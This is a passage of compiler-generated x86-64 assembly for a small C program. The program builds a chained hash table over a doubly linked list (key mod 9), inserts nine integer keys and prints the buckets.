%rbp retq .cfi_endproc ## -- End function .globl _list_search ## -- Begin function list_search .p2align 4, 0x90 _list_search: ## @list_search .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movq -8(%rbp), %rax movq (%rax), %rax movq %rax, -24(%rbp) LBB4_1: ## =>This Inner Loop Header: Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpq $0, -24(%rbp) movb %al, -25(%rbp) ## 1-byte Spill je LBB4_3 ## %bb.2: ## in Loop: Header=BB4_1 Depth=1 movq -24(%rbp), %rax movl (%rax), %eax cmpl -12(%rbp), %eax setne %al movb %al, -25(%rbp) ## 1-byte Spill LBB4_3: ## in Loop: Header=BB4_1 Depth=1 movb -25(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB4_4 jmp LBB4_5 LBB4_4: ## in Loop: Header=BB4_1 Depth=1 movq -24(%rbp), %rax movq 16(%rax), %rax movq %rax, -24(%rbp) jmp LBB4_1 LBB4_5: movq -24(%rbp), %rax popq %rbp retq .cfi_endproc ## -- End function .globl _list_insert ## -- Begin function list_insert .p2align 4, 0x90 _list_insert: ## @list_insert .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -8(%rbp), %rax movq (%rax), %rcx movq -16(%rbp), %rax movq %rcx, 16(%rax) movq -8(%rbp), %rax cmpq $0, (%rax) je LBB5_2 ## %bb.1: movq -16(%rbp), %rcx movq -8(%rbp), %rax movq (%rax), %rax movq %rcx, 8(%rax) LBB5_2: movq -16(%rbp), %rcx movq -8(%rbp), %rax movq %rcx, (%rax) movq -16(%rbp), %rax movq $0, 8(%rax) popq %rbp retq .cfi_endproc ## -- End function .globl _list_delete_ ## -- Begin function list_delete_ .p2align 4, 0x90 _list_delete_: ## @list_delete_ .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -16(%rbp), %rax cmpq $0, 8(%rax) je LBB6_2 ## %bb.1: movq -16(%rbp), %rax movq 16(%rax), %rcx movq -16(%rbp), %rax movq 8(%rax), %rax movq %rcx, 16(%rax) jmp LBB6_3 LBB6_2: movq -16(%rbp), %rax movq 16(%rax), %rcx movq -8(%rbp), %rax movq %rcx, (%rax) LBB6_3: movq -16(%rbp), %rax cmpq $0, 16(%rax) je LBB6_5 ## %bb.4: movq -16(%rbp), %rax movq 8(%rax), %rcx movq -16(%rbp), %rax movq 16(%rax), %rax movq %rcx, 8(%rax) LBB6_5: popq %rbp retq .cfi_endproc ## -- End function .globl _h ## -- Begin function h .p2align 4, 0x90 _h: ## @h .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl -4(%rbp), %eax movl $9, %ecx cltd idivl %ecx movl %edx, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _chained_hash_insert ## -- Begin function chained_hash_insert .p2align 4, 0x90 _chained_hash_insert: ## @chained_hash_insert .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movq -16(%rbp), %rax movq %rax, -32(%rbp) ## 8-byte Spill movq -24(%rbp), %rax movl (%rax), %edi callq _h movq -32(%rbp), %rdi ## 8-byte Reload cltq shlq $3, %rax addq %rax, %rdi movq -24(%rbp), %rsi callq _list_insert addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _chained_hash_search ## -- Begin function chained_hash_search .p2align 4, 0x90 _chained_hash_search: ## @chained_hash_search .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movl %edx, -20(%rbp) movq -16(%rbp), %rax movq %rax, -32(%rbp) ## 8-byte Spill movl -20(%rbp), %edi callq _h movq -32(%rbp), %rdi ## 8-byte Reload cltq shlq $3, %rax addq %rax, %rdi movl -20(%rbp), %esi callq _list_search addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _chained_hash_delete ## -- Begin function chained_hash_delete .p2align 4, 0x90 _chained_hash_delete: ## @chained_hash_delete .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movq -16(%rbp), %rax movq %rax, -32(%rbp) ## 8-byte Spill movq -24(%rbp), %rax movl (%rax), %edi callq _h movq -32(%rbp), %rdi ## 8-byte Reload cltq shlq $3, %rax addq %rax, %rdi movq -24(%rbp), %rsi callq _list_delete_ addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _print_chained_hash ## -- Begin function print_chained_hash .p2align 4, 0x90 _print_chained_hash: ## @print_chained_hash .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movw L___const.print_chained_hash.tails(%rip), %ax movw %ax, -19(%rbp) movb L___const.print_chained_hash.tails+2(%rip), %al movb %al, -17(%rbp) movw L___const.print_chained_hash.tails2(%rip), %ax movw %ax, -22(%rbp) movb L___const.print_chained_hash.tails2+2(%rip), %al movb %al, -20(%rbp) movq $0, -32(%rbp) LBB11_1: ## =>This Loop Header: Depth=1 ## Child Loop BB11_3 Depth 2 movq -32(%rbp), %rax cmpq -8(%rbp), %rax jae LBB11_7 ## %bb.2: ## in Loop: Header=BB11_1 Depth=1 movq -16(%rbp), %rax movq -32(%rbp), %rcx shlq $3, %rcx addq %rcx, %rax movq %rax, -40(%rbp) movq -40(%rbp), %rax movq (%rax), %rax movq %rax, -48(%rbp) movq -32(%rbp), %rsi cmpq $0, -48(%rbp) sete %al andb $1, %al movzbl %al, %eax cltq movsbl -22(%rbp,%rax), %edx leaq L_.str(%rip), %rdi movb $0, %al callq _printf LBB11_3: ## Parent Loop BB11_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpq $0, -48(%rbp) je LBB11_5 ## %bb.4: ## in Loop: Header=BB11_3 Depth=2 movq -48(%rbp), %rax movl (%rax), %esi movq -48(%rbp), %rax cmpq $0, 16(%rax) sete %al andb $1, %al movzbl %al, %eax cltq movsbl -19(%rbp,%rax), %edx leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movq -48(%rbp), %rax movq 16(%rax), %rax movq %rax, -48(%rbp) jmp LBB11_3 LBB11_5: ## in Loop: Header=BB11_1 Depth=1 jmp LBB11_6 LBB11_6: ## in Loop: Header=BB11_1 Depth=1 movq -32(%rbp), %rax addq $1, %rax movq %rax, -32(%rbp) jmp LBB11_1 LBB11_7: addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $336, %rsp ## imm = 0x150 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -308(%rbp) movl %edi, -312(%rbp) movq %rsi, -320(%rbp) leaq -224(%rbp), %rdi leaq l___const.main.keys(%rip), %rsi movl $216, %edx callq _memcpy leaq -304(%rbp), %rdi xorl %esi, %esi movl $72, %edx callq _memset movq $0, -328(%rbp) LBB12_1: ## =>This Inner Loop Header: Depth=1 cmpq $9, -328(%rbp) jae LBB12_4 ## %bb.2: ## in Loop: Header=BB12_1 Depth=1 leaq -304(%rbp), %rsi leaq -224(%rbp), %rdx imulq $24, -328(%rbp), %rax addq %rax, %rdx movl $9, %edi callq _chained_hash_insert ## %bb.3: ## in Loop: Header=BB12_1 Depth=1 movq -328(%rbp), %rax addq $1, %rax movq %rax, -328(%rbp) jmp LBB12_1 LBB12_4: leaq -304(%rbp), %rsi movl $9, %edi callq _print_chained_hash movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB12_6 ## %bb.5: xorl %eax, %eax addq $336, %rsp ## imm = 0x150 popq %rbp retq LBB12_6: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L___const.print_chained_hash.tails: ## @__const.print_chained_hash.tails .asciz ",\n" L___const.print_chained_hash.tails2: ## @__const.print_chained_hash.tails2 .asciz " \n" L_.str: ## @.str .asciz "%zu:%c" L_.str.1: ## @.str.1 .asciz "%d%c" .section __TEXT,__const .p2align 4 ## @__const.main.keys l___const.main.keys: .long 5 ## 0x5 .space 4 .quad 0 .quad 0 .long 28 ## 0x1c .space 4 .quad 0 .quad 0 .long 19 ## 0x13 .space 4 .quad 0 .quad 0 .long 15 ## 0xf .space 4 .quad 0 .quad 0 .long 20 ## 0x14 .space 4 .quad 0 .quad 0 .long 33 ## 0x21 .space 4 .quad 0 .quad 0 .long 12 ## 0xc .space 4 .quad 0 .quad 0 .long 17 ## 0x11 .space 4 .quad 0 .quad 0 .long 10 ## 0xa .space 4 .quad 0 .quad 0 .subsections_via_symbols
the_stack_data/154829243.c